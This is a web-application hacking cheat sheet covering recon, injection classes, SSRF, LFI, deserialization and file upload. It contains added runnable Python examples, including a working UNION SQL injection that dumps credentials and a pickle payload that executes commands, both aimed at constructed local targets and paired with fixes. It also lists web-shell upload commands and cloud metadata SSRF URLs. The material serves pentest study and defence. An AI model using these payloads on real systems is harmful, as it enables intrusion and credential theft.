WEB HACKING
Cheat Sheets
https://gchq.github.io/CyberChef/
https://lelinhtinh.github.io/de4js/
https://xcat.readthedocs.io/en/latest/
https://github.com/detectify/page-fetch
OXML_XXE (https://github.com/BuffaloWill/oxml_xxe)
https://github.com/swisskyrepo/PayloadsAllTheThings
https://book.hacktricks.xyz
https://maxtoroq.github.io/xpath-ref/
https://0xsp.com/
https://github.com/wireghoul/htshells
Tools
wpscan
Droopescan
CMSmap
CMSeeK
WPXF
joomscan
JoomlaVS
Drupwn
Reconnaissance
Content Discovery
Identify Web technology
Wappalyzer
Common filetypes
html
php
aspx
txt
js
feroxbuster / gobuster
Review JavaScript Files
https://lelinhtinh.github.io/de4js/
Review HTML code
Spiders
gospider
Identify directory and filename patterns
Read metadata of files (PDF/Images) to identify Author, E-mails, Software used
Subdomain Enumeration
SSL
Google Dorks
Bruteforce
gobuster dns
ffuf -H "Host: FUZZ.domain.com"
amass
HTTP VERBS
OPTIONS
GET
POST
PUT
DELETE
MOVE
curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
PATCH
INSERT (ARBITRARY VALUE)
HELP
Setting an arbitrary HTTP verb might force the web server to disclose information (error pages, the Allow header, or the fact that unknown verbs fall through to a default handler).
Change Request Method
Provide parameters in GET
Change Content-Type
JSON => XML
https://codebeautify.org/xmltojson
https://www.oxygenxml.com/xml_json_converter.html
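The verb checklist above, worked through as an added example (not from the original page): every verb in the list, including the arbitrary ones, is sent and the status plus Allow header recorded, so PUT/MOVE upload paths and default handling of unknown methods stand out. The target server in the block is a constructed, deliberately permissive stand-in started on loopback so the example runs offline; `probe_verbs()` itself takes any host and port.

```python
"""HTTP verb probing against a constructed permissive server (added example)."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

VERBS = ["OPTIONS", "GET", "HEAD", "POST", "PUT", "DELETE", "MOVE", "PATCH",
         "TRACE", "INSERT", "HELP"]  # INSERT and HELP are arbitrary, non-standard verbs


def probe_verbs(host, port, path="/", verbs=VERBS, timeout=5):
    """Return {verb: (status, Allow header or None)} for one path."""
    results = {}
    for verb in verbs:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request(verb, path)
            resp = conn.getresponse()
            resp.read()  # drain the body so the socket closes cleanly
            results[verb] = (resp.status, resp.getheader("Allow"))
        finally:
            conn.close()
    return results


def worth_a_look(results):
    """Verbs the server did not reject with 405/501.  An accepted PUT or MOVE
    is a possible upload path (see the WebDAV section); an accepted arbitrary
    verb suggests unknown methods fall through to a default handler."""
    return sorted(v for v, (status, _) in results.items() if status not in (405, 501))


class _PermissiveHandler(BaseHTTPRequestHandler):
    """Constructed target: PUT enabled and advertised in Allow; every other
    verb gets the library's default 501 'Unsupported method' response."""
    ALLOW = "OPTIONS, GET, HEAD, POST, PUT"

    def log_message(self, *_):
        pass  # keep the example quiet

    def _reply(self, status, body=b""):
        self.send_response(status)
        self.send_header("Allow", self.ALLOW)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        if self.command != "HEAD":
            self.wfile.write(body)

    def do_GET(self):
        self._reply(200, b"index")

    def do_HEAD(self):
        self._reply(200)

    def do_POST(self):
        self._reply(200, b"posted")

    def do_OPTIONS(self):
        self._reply(200)

    def do_PUT(self):
        self._reply(201)  # accepted without authentication: uploads are possible


def start_demo_server():
    """Bind to an ephemeral loopback port; the caller stops it with .shutdown()."""
    srv = HTTPServer(("127.0.0.1", 0), _PermissiveHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    srv = start_demo_server()
    found = probe_verbs("127.0.0.1", srv.server_port)
    srv.shutdown()
    srv.server_close()
    for verb, (status, allow) in found.items():
        print(f"{verb:8} {status} Allow={allow}")
    print("worth a look:", worth_a_look(found))
```

A 501 for INSERT/HELP is the normal case; what you are hoping for is a 200 (unknown verb handled like GET, which can bypass method-based access rules) or a PUT/MOVE that is not 405. Point `probe_verbs()` at a real host by swapping the host and port.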
HTTP Headers
Common Headers
X-Forwarded-For
X-Real-IP
X-Forwarded-Host
X-Client-IP
X-Forwarded-By
X-Remote-Addr
X-Remote-IP
X-Wap-Profile: <URL-to-XML-file>
Custom Headers
BurpCollaboratorEverywhere (SSRF)
Different User-Agent
Windows
Linux
Android
Custom Value (injection?)
Duplicate Host Header
Some implementations parse HTTP headers such as "User-Agent" in an insecure manner (logged unescaped, passed to a shell, or concatenated into a query), so every header is an injection point.
Command Injection
Shellshock
SSRF
BurpCollaboratorEverywhere
SQLi
Origin overwrite
HTTP Parameters
ParamMiner
HTTP Parameter Pollution
id=1&id=2
Password Reset
User Enumeration
Missing Rate Limiting
Password Reset Poisoning via Host Header Injection
Re-usable Password Reset Token
No Expiration on Password Reset Token
Guessable Password Reset Token
IDN Homograph Attack
Weak Password Policy
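The password reset checklist above, as an added example that is not from the page: a reset-link builder that trusts the Host header (poisoning), a token derived from public values (guessable), a uniform response for unknown accounts (no user enumeration), and a token store that makes tokens single-use and expiring. The application functions, the canonical host name and the user table are all constructed for the example.

```python
"""Password reset pitfalls and their fixes (added example, constructed app)."""
import hashlib
import secrets
import time

CANONICAL_HOST = "app.example.com"  # assumed deployment setting


def reset_link_vulnerable(headers, token):
    """Builds the link from the request's Host header.  An attacker who asks
    for a reset on the victim's account with 'Host: evil.example' gets the
    victim's token delivered to evil.example when the victim clicks the mail."""
    return f"https://{headers['Host']}/reset?token={token}"


def reset_link_hardened(headers, token):
    """Never derive the link from request headers; use configuration."""
    return f"https://{CANONICAL_HOST}/reset?token={token}"


def guessable_token(user_id, now):
    """Anti-pattern: computed from a user id and a second-granularity time,
    so anyone who knows roughly when the reset was requested can recompute it."""
    return hashlib.md5(f"{user_id}:{int(now)}".encode()).hexdigest()


class ResetTokenStore:
    """Single-use, expiring, unguessable tokens.  Only a hash of the token is
    stored so a database leak does not hand out live reset tokens."""
    TTL = 15 * 60  # seconds

    def __init__(self, clock=time.time):
        self._clock = clock
        self._tokens = {}  # sha256(token) -> (user_id, expires_at)

    def issue(self, user_id):
        token = secrets.token_urlsafe(32)  # 256 bits from the CSPRNG
        self._tokens[self._digest(token)] = (user_id, self._clock() + self.TTL)
        return token

    def consume(self, token):
        """Return the user id for a valid token, else None.  The entry is
        removed on first presentation whether or not it had already expired."""
        entry = self._tokens.pop(self._digest(token), None)
        if entry is None:
            return None
        user_id, expires_at = entry
        if self._clock() > expires_at:
            return None
        return user_id

    @staticmethod
    def _digest(token):
        return hashlib.sha256(token.encode()).hexdigest()


def request_reset(email, known_users, store):
    """Same response whether or not the address is registered, so the endpoint
    cannot be used for user enumeration.  Rate limiting per address and per
    source IP still belongs in front of this."""
    if email in known_users:
        store.issue(known_users[email])  # the token is mailed out of band
    return "If that address is registered, a reset link has been sent."
```

Timing also matters for the enumeration case: if issuing a token is measurably slower than the no-op branch, the uniform message does not help much, so do the expensive work (or a dummy of it) on both paths.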
Information Disclosure
Generate an error
Special characters
HTTP Parameters
Change type to array ( ?id= to ?id[]= )
Missing parameters
Parameter Pollution
Non existing page => 404
Very long session/cookies
HTML code review
JS code review
Search for ".map" files
https://lelinhtinh.github.io/de4js/
Path Traversal
NGINX
nginx.conf
location /path misconfiguration: a location without a trailing slash combined with an alias directive, so that /path.. resolves to the parent of the alias directory
vulnerable.site/path..%2f..%2f..%2f..%2fetc%2fpasswd
Filter Bypass
Unicode
Codepoints:  
URL Encoding: %2e%2e%2f
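The traversal payloads and filter bypasses above, as an added example that is not from the page: a generator for the plain, URL-encoded, mixed, double-encoded and nginx alias (`/path..`) forms of one traversal, a naive substring filter that only stops the plain form, and a decode-then-normalise check that rejects all of them. The web root is an assumed value.

```python
"""Path traversal payload variants against a naive and a hardened check (added example)."""
import posixpath
import urllib.parse

WEBROOT = "/var/www/html"  # assumed document root


def traversal_variants(target="etc/passwd", depth=4):
    """Encodings of one traversal.  'alias' is the nginx off-by-slash form from
    the text: '..' is glued straight onto the location prefix 'path'."""
    return {
        "plain": "../" * depth + target,
        "urlencoded": "%2e%2e%2f" * depth + target,
        "mixed": "..%2f" * depth + target,
        "double": "%252e%252e%252f" * depth + target,
        "alias": "path" + "..%2f" * depth + target.replace("/", "%2f"),
    }


def naive_filter(raw_path):
    """Typical broken check: substring match on the raw, still-encoded path."""
    return "../" not in raw_path


def resolves_inside_root(raw_path, webroot=WEBROOT, max_decode=2):
    """Percent-decode until stable (bounded, so double encoding is covered),
    normalise, and compare the result against the web root prefix."""
    decoded = raw_path
    for _ in range(max_decode):
        nxt = urllib.parse.unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    full = posixpath.normpath(posixpath.join(webroot, decoded.lstrip("/")))
    return full == webroot or full.startswith(webroot + "/")


if __name__ == "__main__":
    for name, payload in traversal_variants().items():
        print(f"{name:11} naive_allows={naive_filter(payload)!s:5} "
              f"inside_root={resolves_inside_root(payload)}")
```

The decoder here handles percent-encoding only; overlong UTF-8 such as `%c0%af` and other Unicode spellings of `/` should be rejected outright (invalid UTF-8) rather than decoded, and the real fix for the nginx case is a trailing slash on the `location`.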
Web Servers
Apache
/etc/apache2/apache2.conf
/etc/apache2/envvars
/etc/apache2/sites-enabled/000-default.conf
/var/log/apache2/error.log
NGINX
/etc/nginx/nginx.conf
/etc/nginx/locations.conf
/etc/nginx/server.conf
/etc/nginx/sites-enabled/default
NodeJS
var http = require('http');
LDAP Injection
XPATH Injection
https://xcat.readthedocs.io/en/latest/
https://maxtoroq.github.io/xpath-ref/
OS Command Injection
SQL Injection
Identify number of columns
UNION SELECT NULL, NULL, NULL, NULL; -- -
Identify column data types and which columns are visible
Identify database type (MySQL, PostgreSQL, ...) and version
sqlmap
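The UNION steps above carried through in code, as an added example that is not from the page: grow the NULL list until the column count matches, place a marker in each column to see which ones are rendered, then read another table through the visible slots. The vulnerable page and its SQLite data are constructed so the block runs offline; the same payloads apply to other databases with the fingerprinting expression swapped (`@@version` on MySQL, `version()` on PostgreSQL).

```python
"""UNION-based SQL injection against a constructed SQLite-backed page (added example)."""
import sqlite3


def make_db():
    """Constructed sample data: the products the page shows, the users the
    attacker wants."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price REAL, stock INTEGER);
        INSERT INTO products VALUES (1, 'widget', 9.99, 10), (2, 'gadget', 19.5, 0);
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cret');
    """)
    return db


def _render(rows):
    # Only name and price reach the HTML; id and stock stay server-side.  That
    # is why the attacker must discover which columns are visible.
    return "\n".join(f"<li>{name}: {price}</li>" for _id, name, price, _stock in rows)


def vulnerable_page(db, product_id):
    """String-concatenated query: the injection point."""
    sql = f"SELECT id, name, price, stock FROM products WHERE id = {product_id}"
    return _render(db.execute(sql).fetchall())


def safe_page(db, product_id):
    """Same page with a bound parameter; the payloads below match no row."""
    rows = db.execute("SELECT id, name, price, stock FROM products WHERE id = ?",
                      (product_id,)).fetchall()
    return _render(rows)


def find_column_count(page, max_cols=10):
    """Grow the NULL list until the UNION stops raising a column-count error."""
    for n in range(1, max_cols + 1):
        try:
            page("0 UNION SELECT " + ", ".join(["NULL"] * n) + "-- -")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def find_visible_columns(page, ncols, marker="'inj3ct'"):
    """Put a marker string in one column at a time and see which echo back.
    On MySQL/PostgreSQL this also probes the column type (a string in an
    integer column errors); SQLite is dynamically typed, so only visibility
    is learned here."""
    visible = []
    for i in range(ncols):
        cols = ["NULL"] * ncols
        cols[i] = marker
        if marker.strip("'") in page("0 UNION SELECT " + ", ".join(cols) + "-- -"):
            visible.append(i)
    return visible


def read_table(page, ncols, visible, columns, table):
    """Map the wanted columns onto the visible output slots."""
    cols = ["NULL"] * ncols
    for slot, column in zip(visible, columns):
        cols[slot] = column
    return page(f"0 UNION SELECT {', '.join(cols)} FROM {table}-- -")


if __name__ == "__main__":
    db = make_db()
    page = lambda p: vulnerable_page(db, p)
    n = find_column_count(page)
    vis = find_visible_columns(page, n)
    print("columns:", n, "visible:", vis)
    print(read_table(page, n, vis, ["username", "password"], "users"))
```

`id = 0` is chosen so the legitimate query contributes no row and only the UNION half is rendered; to fingerprint the server put `sqlite_version()` (or the equivalent for the engine) into a visible slot instead of a table column.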
NOSQL Injection
XML eXternal Entities (XXE)
OOB (Out of Band)
xxe.sh
OXML_XXE (https://github.com/BuffaloWill/oxml_xxe)
OOXML (DOCX, XLSX, PPTX), ODF, PDF, RSS
File Inclusion (LFI/RFI)
Wrappers
phar://
Access archives
zlib://
file://
ogg://
expect://
glob:// File pattern matching
data://
php://
php://filter/convert.base64-encode/resource=
Log Poisoning
Session Poisoning
Interesting Files
Race Conditions (TOCTOU)
Template Injection (SSTI)
Python
Jinja2
PHP
Twig
Server Side Request Forgery (SSRF)
gopher:// URL Scheme
Filter Bypass
127.0.0.1.nip.io
localhost == [::]
decimal notation 127.0.0.1 == 2130706433
IPv6/IPv4 Embedding [0:0:0:0:0:ffff:127.0.0.1]
Cloud
AWS http://169.254.169.254/latest/meta-data
Alibaba http://100.100.100.200/latest/meta-data/
Oracle Cloud http://192.0.0.192/latest/meta-data/
Digital Ocean http://169.254.169.254/metadata/v1.json
Request Smuggling
Smuggler
Insecure Deserialization
Check all user controlled input
Cookies / Sessions
The application would need to deserialize untrusted user input
HTTP Parameters
HTTP Headers
Remote Method Invocation (RMI)
Python
Pickle
PyYAML load
Java
Magic Numbers "AC ED 00 05"
Java-Deserialization-Cheat-Sheet
ysoserial
XMLDecoder
XStream->fromXML
ObjectInputStream
ObjectInputStream->readExternal
ObjectInputStream->readResolve
ObjectInputStream->readObject
ObjectInputStream->readUnshared
Content-Type: application/x-java-serialized-object
Ruby
Marshal.load (unmarshal)
PHP
unserialize
phpggc
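The Python pickle entry above, as an added example that is not from the page: a pickle whose `__reduce__` makes `pickle.loads` run a command, the restricted unpickler that stops it by allow-listing the one class the application expects, and a small sniffer for the magic bytes of the formats listed (the Java `AC ED 00 05` from the text, its base64 form, pickle, PHP and Ruby Marshal). The `Profile` class, the command and the sample blobs are constructed.

```python
"""Pickle deserialization: exploit, restricted unpickler, format sniffing (added example)."""
import io
import pickle
import subprocess


class Exploit:
    """pickle records the result of __reduce__ on dump and calls the returned
    callable on load; here that is subprocess.check_output, i.e. code execution."""
    def __reduce__(self):
        return (subprocess.check_output, (["echo", "pwned"],))


def malicious_pickle():
    return pickle.dumps(Exploit())


def unsafe_load(blob):
    """What a vulnerable application does with a user-supplied cookie or parameter."""
    return pickle.loads(blob)


class Profile:
    """The only type the application legitimately stores (constructed)."""
    def __init__(self, user, theme):
        self.user, self.theme = user, theme


class RestrictedUnpickler(pickle.Unpickler):
    """find_class is consulted for every global the stream references; refusing
    everything except the expected class removes the attacker's callables."""
    def find_class(self, module, name):
        if (module, name) == (Profile.__module__, "Profile"):
            return Profile
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def safe_load(blob):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def sniff(data):
    """Rough format identification from leading bytes."""
    if data[:4] == b"\xac\xed\x00\x05":
        return "java"
    if data[:5] == b"rO0AB":                    # base64 of AC ED 00 05
        return "java-base64"
    if data[:1] == b"\x80" and data[1] in (2, 3, 4, 5):
        return "python-pickle"
    if data[:2] == b"\x04\x08":
        return "ruby-marshal"
    if data[:2] in (b"O:", b"a:", b"s:", b"i:"):
        return "php"
    return "unknown"


if __name__ == "__main__":
    blob = malicious_pickle()
    print(sniff(blob), unsafe_load(blob))  # the command runs during loads()
    try:
        safe_load(blob)
    except pickle.UnpicklingError as exc:
        print("blocked:", exc)
```

Even the restricted unpickler is a mitigation, not a design: pickle is a bytecode format and the right fix for untrusted input is a data-only format (JSON) with explicit validation, the same reasoning that turns `yaml.load` into `yaml.safe_load`.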
Cross Site Scripting (XSS)
Same Origin Policy (SOP)
Cross Origin Resource Sharing (CORS)
Check for request/response splitting (CRLF injection): injected Access-Control-* headers relax the policy
Check whether the Origin header is reflected into Access-Control-Allow-Origin together with Access-Control-Allow-Credentials: true, which lets a cross-origin script read authenticated responses
File Upload
WebDAV
cadaver
davtest
davtest [-auth user:password] -move -sendbd auto -url http://<IP>
curl -T file.txt http://<IP>
HTTP MOVE
curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
web.config (ASP.NET)
Make specific file extensions executable (e.g. execute txt files)
https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/
.htaccess (Apache)
Make specific file extensions executable (e.g. execute txt files)
https://github.com/wireghoul/htshells
Content-Type filter bypass
Magic Bytes filter bypass
Double Extensions filter bypass
Alternative extensions blacklist filter bypass
Prototype Pollution
https://github.com/detectify/page-fetch
Content Management Systems (CMS)
WordPress
wpscan
Droopescan
CMSmap
CMSeeK
WPXF
Joomla
joomscan
Droopescan
CMSmap
CMSeeK
JoomlaVS
Drupal
Droopescan
CMSmap
Drupwn
CMSeeK